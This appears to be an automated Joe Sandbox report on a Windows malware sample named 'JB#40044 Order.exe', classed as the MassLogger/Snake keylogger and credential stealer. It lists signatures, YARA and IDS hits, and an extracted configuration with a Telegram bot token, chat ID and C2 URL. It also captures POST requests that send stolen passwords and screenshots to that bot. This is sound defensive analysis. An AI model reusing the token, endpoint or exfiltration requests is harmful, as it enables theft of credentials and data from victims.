Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JB#40044 Order.exe

Overview

General Information

Sample name:JB#40044 Order.exe
Analysis ID:1586597
MD5:ecaa670aaa2b739b6891fd57deb79731
SHA1:b2107d2b22b0c7cae6b5277bfcdbd71231c5d5a7
SHA256:844031a92a7e8e372c63342a0b815cd8a7b7d30760c8d162b40a9febb0a5d73a
Tags:exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • JB#40044 Order.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\JB#40044 Order.exe" MD5: ECAA670AAA2B739B6891FD57DEB79731)
    • RegAsm.exe (PID: 7588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": "https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38", "Telegram Chatid": "5088754730"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xffa5:$a1: get_encryptedPassword
        • 0x102e1:$a2: get_encryptedUsername
        • 0xfd32:$a3: get_timePasswordChanged
        • 0xfe53:$a4: get_passwordField
        • 0xffbb:$a5: set_encryptedPassword
        • 0x1198b:$a7: get_logins
        • 0x1163c:$a8: GetOutlookPasswords
        • 0x1141a:$a9: StartKeylogger
        • 0x118db:$a10: KeyLoggerEventArgs
        • 0x11477:$a11: KeyLoggerEventArgsEventHandler
        00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.JB#40044 Order.exe.383dd28.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.JB#40044 Order.exe.383dd28.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.JB#40044 Order.exe.383dd28.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.JB#40044 Order.exe.383dd28.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xe3a5:$a1: get_encryptedPassword
                • 0xe6e1:$a2: get_encryptedUsername
                • 0xe132:$a3: get_timePasswordChanged
                • 0xe253:$a4: get_passwordField
                • 0xe3bb:$a5: set_encryptedPassword
                • 0xfd8b:$a7: get_logins
                • 0xfa3c:$a8: GetOutlookPasswords
                • 0xf81a:$a9: StartKeylogger
                • 0xfcdb:$a10: KeyLoggerEventArgs
                • 0xf877:$a11: KeyLoggerEventArgsEventHandler
                0.2.JB#40044 Order.exe.383dd28.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1365b:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x12b59:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x12e67:$a4: \Orbitum\User Data\Default\Login Data
                • 0x13c5f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 30 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T11:38:04.352430+010020577441Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T11:37:54.884647+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                2025-01-09T11:38:02.478281+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                2025-01-09T11:38:05.400151+010028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                2025-01-09T11:39:03.384594+010028032742Potentially Bad Traffic192.168.2.449839132.226.247.7380TCP
                2025-01-09T11:39:21.009703+010028032742Potentially Bad Traffic192.168.2.449966132.226.247.7380TCP
                2025-01-09T11:39:23.978360+010028032742Potentially Bad Traffic192.168.2.449985132.226.247.7380TCP
                2025-01-09T11:39:26.572102+010028032742Potentially Bad Traffic192.168.2.450003132.226.247.7380TCP
                2025-01-09T11:39:42.775242+010028032742Potentially Bad Traffic192.168.2.450093132.226.247.7380TCP
                2025-01-09T11:39:45.810545+010028032742Potentially Bad Traffic192.168.2.450097132.226.247.7380TCP
                2025-01-09T11:39:54.969538+010028032742Potentially Bad Traffic192.168.2.450109132.226.247.7380TCP
                2025-01-09T11:39:57.919928+010028032742Potentially Bad Traffic192.168.2.450113132.226.247.7380TCP
                2025-01-09T11:40:19.103711+010028032742Potentially Bad Traffic192.168.2.450127132.226.247.7380TCP
                2025-01-09T11:40:28.143561+010028032742Potentially Bad Traffic192.168.2.450139132.226.247.7380TCP
                2025-01-09T11:40:35.719476+010028032742Potentially Bad Traffic192.168.2.450147132.226.247.7380TCP
                2025-01-09T11:41:04.517172+010028032742Potentially Bad Traffic192.168.2.450186132.226.247.7380TCP
                2025-01-09T11:41:30.181627+010028032742Potentially Bad Traffic192.168.2.450220132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T11:38:04.075490+010018100081Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP
                2025-01-09T11:38:05.986996+010018100081Potentially Bad Traffic192.168.2.449734149.154.167.220443TCP
                2025-01-09T11:38:08.388920+010018100081Potentially Bad Traffic192.168.2.449736149.154.167.220443TCP
                2025-01-09T11:38:10.786103+010018100081Potentially Bad Traffic192.168.2.449738149.154.167.220443TCP
                2025-01-09T11:38:13.177667+010018100081Potentially Bad Traffic192.168.2.449742149.154.167.220443TCP
                2025-01-09T11:38:15.643460+010018100081Potentially Bad Traffic192.168.2.449748149.154.167.220443TCP
                2025-01-09T11:38:18.088015+010018100081Potentially Bad Traffic192.168.2.449750149.154.167.220443TCP
                2025-01-09T11:38:20.527231+010018100081Potentially Bad Traffic192.168.2.449752149.154.167.220443TCP
                2025-01-09T11:38:22.995583+010018100081Potentially Bad Traffic192.168.2.449754149.154.167.220443TCP
                2025-01-09T11:38:25.903234+010018100081Potentially Bad Traffic192.168.2.449756149.154.167.220443TCP
                2025-01-09T11:38:28.472963+010018100081Potentially Bad Traffic192.168.2.449758149.154.167.220443TCP
                2025-01-09T11:38:30.832201+010018100081Potentially Bad Traffic192.168.2.449760149.154.167.220443TCP
                2025-01-09T11:38:33.170638+010018100081Potentially Bad Traffic192.168.2.449762149.154.167.220443TCP
                2025-01-09T11:38:35.536929+010018100081Potentially Bad Traffic192.168.2.449764149.154.167.220443TCP
                2025-01-09T11:38:37.873335+010018100081Potentially Bad Traffic192.168.2.449766149.154.167.220443TCP
                2025-01-09T11:38:40.252611+010018100081Potentially Bad Traffic192.168.2.449768149.154.167.220443TCP
                2025-01-09T11:38:42.606349+010018100081Potentially Bad Traffic192.168.2.449770149.154.167.220443TCP
                2025-01-09T11:38:44.942098+010018100081Potentially Bad Traffic192.168.2.449772149.154.167.220443TCP
                2025-01-09T11:38:47.295256+010018100081Potentially Bad Traffic192.168.2.449774149.154.167.220443TCP
                2025-01-09T11:38:49.765565+010018100081Potentially Bad Traffic192.168.2.449776149.154.167.220443TCP
                2025-01-09T11:38:52.213136+010018100081Potentially Bad Traffic192.168.2.449779149.154.167.220443TCP
                2025-01-09T11:38:54.592084+010018100081Potentially Bad Traffic192.168.2.449781149.154.167.220443TCP
                2025-01-09T11:38:56.925077+010018100081Potentially Bad Traffic192.168.2.449794149.154.167.220443TCP
                2025-01-09T11:38:59.293438+010018100081Potentially Bad Traffic192.168.2.449811149.154.167.220443TCP
                2025-01-09T11:39:01.642068+010018100081Potentially Bad Traffic192.168.2.449828149.154.167.220443TCP
                2025-01-09T11:39:03.961285+010018100081Potentially Bad Traffic192.168.2.449845149.154.167.220443TCP
                2025-01-09T11:39:06.283403+010018100081Potentially Bad Traffic192.168.2.449862149.154.167.220443TCP
                2025-01-09T11:39:08.587440+010018100081Potentially Bad Traffic192.168.2.449879149.154.167.220443TCP
                2025-01-09T11:39:10.891260+010018100081Potentially Bad Traffic192.168.2.449896149.154.167.220443TCP
                2025-01-09T11:39:14.434972+010018100081Potentially Bad Traffic192.168.2.449918149.154.167.220443TCP
                2025-01-09T11:39:16.808512+010018100081Potentially Bad Traffic192.168.2.449935149.154.167.220443TCP
                2025-01-09T11:39:19.182920+010018100081Potentially Bad Traffic192.168.2.449952149.154.167.220443TCP
                2025-01-09T11:39:21.689730+010018100081Potentially Bad Traffic192.168.2.449970149.154.167.220443TCP
                2025-01-09T11:39:24.569832+010018100081Potentially Bad Traffic192.168.2.449989149.154.167.220443TCP
                2025-01-09T11:39:27.126323+010018100081Potentially Bad Traffic192.168.2.450008149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: JB#40044 Order.exeAvira: detected
                Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38", "Telegram Chatid": "5088754730"}
                Source: RegAsm.exe.7588.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendMessage"}
                Source: JB#40044 Order.exeVirustotal: Detection: 44%Perma Link
                Source: JB#40044 Order.exeReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: JB#40044 Order.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49935 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50075 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50140 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50142 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50144 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50146 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50150 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50152 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50160 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50166 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50169 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50172 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50178 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50181 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50184 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50189 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50192 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50195 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50198 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50201 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50203 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50206 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50209 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50212 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50215 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50221 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50224 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50227 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50230 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50233 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50236 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50239 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50244 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50247 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50250 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50253 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50256 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50259 version: TLS 1.2
                Source: JB#40044 Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Administrator\Source\Repos\QWEORITU\QWEORITU\obj\Debug\CTTUUEH.pdb source: JB#40044 Order.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 017B5782h1_2_017B5358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 017B51B9h1_2_017B4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 017B5782h1_2_017B5366
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 017B5782h1_2_017B56AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0724A78Eh1_2_0724A5D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0724A78Eh1_2_0724A6DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]1_2_07249F0F

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49736 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49734 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49738 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49742 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49750 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49752 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49754 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49756 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49758 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49760 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49764 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49766 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49768 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49774 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49748 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49770 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49781 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49762 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49776 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49794 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49811 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49772 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49779 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49845 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49862 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49828 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49879 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49896 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49918 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49935 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49952 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49970 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49989 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50008 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd306fc847fe8dHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0AC